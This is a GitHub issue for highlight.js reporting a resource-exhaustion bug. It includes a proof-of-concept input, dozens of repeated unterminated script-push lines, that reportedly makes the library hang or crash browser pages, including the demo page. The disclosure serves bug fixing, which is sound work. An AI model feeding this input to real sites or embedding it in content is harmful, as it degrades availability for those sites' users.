8000 Resource exhaustion · Issue #4261 · highlightjs/highlight.js · GitHub
[go: up one dir, main page]
Skip to content
Resource exhaustion #4261
New issue
New issue
Open
Open
Resource exhaustion#4261
Labels
bughelp welcomeCould use help from communityparser
@ErazerBrecht

Description

@ErazerBrecht
ErazerBrecht
opened on May 14, 2025

Describe the issue/behavior that seems buggy
While testing our code, we found that we could make our 'markdown editor' crash.
After some additional research, I found that the highlighting caused it.

I also decided to test the POC on the demo page of highlight.js, and there it also uses a lot of resources.
The browser will eventually show the 'This page isn't responding' pop-up

Sample Code or Instructions to Reproduce

<body>
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
    <script>self.__next_f.push([1,":[\"
</body>

Expected behavior
Page doesn't crash

Additional context
I submitted this to security@highlightjs.org, but didn't get any response.
This can be used to impact the availability of a webpage.

Metadata

Metadata

Assignees

No one assigned

    Labels

    bughelp welcomeCould use help from communityparser

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions
      0